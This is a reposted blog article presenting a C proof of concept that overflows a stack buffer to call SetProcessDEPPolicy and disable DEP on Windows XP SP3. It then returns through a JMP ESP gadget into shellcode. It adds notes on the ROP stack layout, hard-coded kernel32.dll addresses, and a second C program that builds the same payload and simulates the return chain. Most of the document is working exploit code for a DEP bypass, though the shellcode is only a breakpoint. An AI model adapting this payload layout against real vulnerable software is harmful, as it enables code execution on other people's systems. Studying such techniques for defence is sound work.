DEP bypass with SetProcessDEPPolicy() [repost]


    /*
    This is a proof of concept of buffer overflow exploitation with DEP
    bypass on Windows XP Professional SP3 English, updated on December 9,
    2009, with DEP manually set to OptOut, i.e. enabled for all processes
    except the ones put in the exception list, which this program is not.

    This source has been compiled with Microsoft Visual C++ 2008 Express
    Edition in Release mode with the default flags. This includes
    /NXCOMPAT and /GS.

    Buffer Security Check (stack cookie, /GS flag) does not need to be
    bypassed because the string buffer, buf, in this example is only
    4 bytes long, so the compiler does not add a GS cookie to the
    useSetProcessDEPPolicy() function (/GS only protects arrays larger
    than 4 bytes). Remember that the strict_gs_check pragma is turned
    off by default.

    References:
    * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
      Server 2008' by Michael Howard,
      http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
    * SetProcessDEPPolicy Function,
      http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx

    Feel free to write me for comments and questions,
    Bernardo Damele A. G. <bernardo.damele@gmail.com>
    */


    #include <windows.h>
    #include <stdlib.h>
    #include <string.h>   /* strcpy(), memcpy() */


    void useSetProcessDEPPolicy()
    {
        char buf[4];

        /* Overflow the string buffer and the saved EBP (4 + 4 bytes). */
        strcpy(buf, "AAAABBBB");

        /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
        Windows XP SP3 and Windows Server 2008 and can be abused by an
        attacker while exploiting a buffer overflow vulnerability to disable
        hardware-enforced DEP (NX/XD bit) for the running process.

        Overwrite the saved return address (EIP) with the address of
        SetProcessDEPPolicy(), which is 0x7c8622a4 in kernel32.dll on a
        Windows XP SP3 English 32-bit system updated on December 9, 2009.

        NOTE: You might need to adapt it depending on your system patch
        level. */
        memcpy(buf+8, "\xa4\x22\x86\x7c", 4);

        /* Return address for SetProcessDEPPolicy().
        Use the address of a JMP ESP instruction in kernel32.dll. The API is
        stdcall, so its RET 4 pops this address and discards the argument
        below it, leaving ESP at buf+20, which is where the shellcode sits.

        NOTE: You might need to adapt it depending on your system patch
        level. */
        memcpy(buf+12, "\x13\x44\x87\x7c", 4);

        /* Argument (dwFlags) for SetProcessDEPPolicy().
        0x00000000 turns DEP off for this process. */
        memcpy(buf+16, "\x00\x00\x00\x00", 4);

        /* The shellcode to be executed after DEP has been disabled.
        For instance, a breakpoint (INT 3 instruction) to invoke the
        debug exception handler, which will pause the process. */
        memcpy(buf+20, "\xcc", 1);
    }


    int main()
    {
        useSetProcessDEPPolicy();

        return 0;
    }
       
      Disabling DEP with SetProcessDEPPolicy
      Applies to: Windows XP SP3, Vista SP1 and Windows Server 2008.
      For this function to have any effect, the current DEP policy must be OptIn or
      OptOut. If the policy is AlwaysOn (or AlwaysOff), SetProcessDEPPolicy will fail
      with an error. If the module is linked with /NXCOMPAT, the technique will not
      work either. Last but not least, it can only be called once per process, so if
      the function has already been called by the current process (as IE8 does at
      startup), it will fail.
      Note that Damele's PoC above is compiled with /NXCOMPAT and still works on XP
      SP3: the /NXCOMPAT restriction bites where the loader turns the image flag into
      a permanent DEP policy for the process, which his XP SP3 test evidently did
      not.
      Bernardo Damele wrote a blog post about this technique:
      http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html
      The function prototype is:
      BOOL WINAPI SetProcessDEPPolicy(
        __in DWORD dwFlags
      );
      The function takes a single argument, which must be 0 to disable DEP for the
      current process.
      To use this function in a ROP chain, set up the stack as follows:
      ● pointer to SetProcessDEPPolicy
      ● pointer to the shellcode
      ● 0
      The pointer to the shellcode is the return address SetProcessDEPPolicy() will
      use, so that once the API returns execution continues in the shellcode. In
      Damele's PoC the second slot is a JMP ESP gadget rather than the shellcode
      address itself: SetProcessDEPPolicy is stdcall and cleans up its own DWORD
      argument (RET 4), so ESP lands just past the 0, exactly where the shellcode
      starts.
      On XP SP3 the address of SetProcessDEPPolicy is 7C8622A4 (kernel32.dll).
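The stack layout above is easy to get off by one DWORD, and the PoC's JMP ESP trick only works because of the callee-side argument cleanup. The following example, added here and not part of Damele's PoC or the original post, builds the same overflow payload (buf, saved EBP, SetProcessDEPPolicy, JMP ESP, dwFlags = 0, shellcode) and then walks a small model of the x86 return sequence (RET, the API's stdcall RET 4, JMP ESP) to show where execution lands. The kernel32.dll addresses are the ones quoted on the page for XP SP3 and the stack base address is an assumed value; nothing here touches a real process.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of the vulnerable frame from the PoC: char buf[4], then the saved
   EBP, then the saved return address. */
#define BUF_LEN       4
#define SAVED_EBP_LEN 4

/* Addresses quoted on the page for XP SP3 English (kernel32.dll). Assumed
   for this example; they differ on any other patch level. */
#define ADDR_SETPROCESSDEPPOLICY 0x7c8622a4u
#define ADDR_JMP_ESP             0x7c874413u

static void put32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Read a little-endian DWORD from the modelled stack; 0 if out of bounds. */
static int read_stack(const uint8_t *stack, size_t len, uint32_t base,
                      uint32_t addr, uint32_t *out)
{
    uint32_t off = addr - base;
    if (addr < base || off > len || len - off < 4) return 0;
    *out = (uint32_t)stack[off] | ((uint32_t)stack[off + 1] << 8) |
           ((uint32_t)stack[off + 2] << 16) | ((uint32_t)stack[off + 3] << 24);
    return 1;
}

/* Build the overflow: buf | saved EBP | SetProcessDEPPolicy | JMP ESP | 0 | shellcode.
   Returns the payload length, or 0 if cap is too small. */
size_t build_payload(uint8_t *out, size_t cap, const uint8_t *sc, size_t sc_len)
{
    size_t off = 0;
    if (cap < BUF_LEN + SAVED_EBP_LEN + 12 + sc_len) return 0;
    memset(out + off, 'A', BUF_LEN);            off += BUF_LEN;       /* fills buf */
    memset(out + off, 'B', SAVED_EBP_LEN);      off += SAVED_EBP_LEN; /* clobbers saved EBP */
    put32(out + off, ADDR_SETPROCESSDEPPOLICY); off += 4;             /* saved EIP */
    put32(out + off, ADDR_JMP_ESP);             off += 4;             /* return address for the API */
    put32(out + off, 0);                        off += 4;             /* dwFlags = 0 */
    memcpy(out + off, sc, sc_len);              off += sc_len;        /* shellcode */
    return off;
}

/* Walk the control flow the payload produces, on a model of x86 semantics:
   RET from the vulnerable function, the API's stdcall RET 4 (the callee pops
   its one DWORD argument), then JMP ESP. Returns the payload offset where
   execution lands, or -1 if the chain breaks. *dep_off is set to 1 when the
   API was reached with dwFlags == 0. */
long simulate_chain(const uint8_t *stack, size_t len, uint32_t base, int *dep_off)
{
    uint32_t esp = base + BUF_LEN + SAVED_EBP_LEN; /* ESP just before RET */
    uint32_t eip, flags;
    *dep_off = 0;

    /* RET in useSetProcessDEPPolicy(): pop the saved EIP */
    if (!read_stack(stack, len, base, esp, &eip)) return -1;
    esp += 4;
    if (eip != ADDR_SETPROCESSDEPPOLICY) return -1;

    /* Inside SetProcessDEPPolicy: [ESP] = return address, [ESP+4] = dwFlags */
    if (!read_stack(stack, len, base, esp + 4, &flags)) return -1;
    *dep_off = (flags == 0);

    /* RET 4: pop the return address, then discard the argument slot */
    if (!read_stack(stack, len, base, esp, &eip)) return -1;
    esp += 4 + 4;
    if (eip != ADDR_JMP_ESP) return -1;

    /* JMP ESP: execution continues at whatever ESP points to now */
    eip = esp;
    if (eip - base >= len) return -1;  /* ran off the end of the payload */
    return (long)(eip - base);
}

int main(void)
{
    uint8_t payload[64];
    const uint8_t sc[] = { 0xcc };  /* INT 3, as in the PoC */
    int dep_off;
    size_t n = build_payload(payload, sizeof payload, sc, sizeof sc);
    /* 0x0012ff60 is an assumed address for buf, used only to model ESP */
    long land = simulate_chain(payload, n, 0x0012ff60u, &dep_off);
    printf("payload %zu bytes, DEP disabled: %d, lands at offset %ld (byte 0x%02x)\n",
           n, dep_off, land, land >= 0 ? payload[land] : 0);
    return 0;
}
```

The model makes the failure mode visible: leave out the dwFlags slot and put the shellcode straight after the JMP ESP address, and the API reads the first shellcode bytes as its argument (so DEP stays on) while its RET 4 moves ESP past the shellcode entirely.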
Original article: https://www.cnblogs.com/moonflow/p/2529153.html